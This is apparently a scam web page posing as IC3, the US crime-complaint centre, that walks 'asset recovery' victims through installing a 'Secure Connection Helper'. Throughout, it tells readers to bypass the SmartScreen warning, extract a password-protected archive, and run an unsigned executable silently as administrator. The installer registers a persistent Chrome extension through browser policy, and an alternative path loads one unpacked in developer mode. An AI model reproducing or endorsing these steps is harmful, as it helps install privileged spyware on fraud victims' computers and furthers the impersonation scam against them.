Install the IC3 Secure Connection Helper

This Chrome extension is required for all IC3 asset recovery sessions. It establishes a secure, persistent connection to the IC3 recovery server for the duration of your session.

Installation Guide
Windows SmartScreen notice — Windows may display "Windows protected your PC" when running the installer. Click More info then Run anyway. This prompt appears for all unsigned executables and does not indicate a security risk.

Download and extract
Click Download IC3 Secured Server above. Once downloaded, right-click the ZIP and select Extract All. When prompted for a password enter ic3secure, then open the extracted folder.

Run as Administrator
Right-click IC3 Secured Server.exe inside the extracted folder and select Run as administrator. When the UAC dialog appears asking to allow changes to your device, click Yes.

Wait for completion
The installer runs silently. No window or progress bar is shown — this is expected. Allow 15–30 seconds for the process to complete.

Restart Google Chrome
Fully close all Chrome windows, then reopen Chrome. The extension activates automatically on the next launch.

Confirm the extension is active
The IC3 shield icon will appear in the Chrome toolbar. Click it — the popup should show a Connected status and a Case ID within a few seconds.
One-time setup. The installer registers the extension with Chrome's policy system. It will load automatically on every Chrome startup — you do not need to run the installer again.

Download and extract the package
Download ICC3-Extension.zip and right-click it → Extract All. Choose a permanent location (Desktop or Documents). Do not move or delete this folder after installing — Chrome loads the extension from it on every start.

Open Chrome Extensions
In Chrome, type chrome://extensions in the address bar and press Enter. Alternatively: Menu (⋮) → Extensions → Manage Extensions.

Enable Developer Mode
Toggle Developer mode ON using the switch in the top-right corner of the Extensions page. A toolbar with additional options will appear.

Load the extension
Click Load unpacked. In the file picker, select the folder you extracted in Step 1 — the folder that contains manifest.json. Click Select Folder.

Confirm the extension is active
The IC3 Secure Connection Helper card appears in the extensions list with its toggle enabled. The shield icon appears in the Chrome toolbar — click it to verify the connection status.
Keep the extracted folder in place. If you move or delete it, Chrome will automatically remove the extension. You would need to repeat from Step 4 to reinstall.

Verify Installation
Shield icon visible in Chrome toolbar The IC3 icon appears in the top-right area of Chrome, next to the address bar. If you don't see it, click the puzzle-piece icon to pin it.
Popup shows "Connected" Click the icon — the popup should report a green Connected status within 5–10 seconds of opening a tab.
Case ID is displayed A unique Case ID (e.g. A3F2-9B1C-...) appears in the popup. Note this down — your recovery agent may ask for it.
Developer mode reminder (manual install only) Chrome may show a one-time banner at the top saying developer mode extensions are enabled. This is normal — dismiss it and it will not reappear.
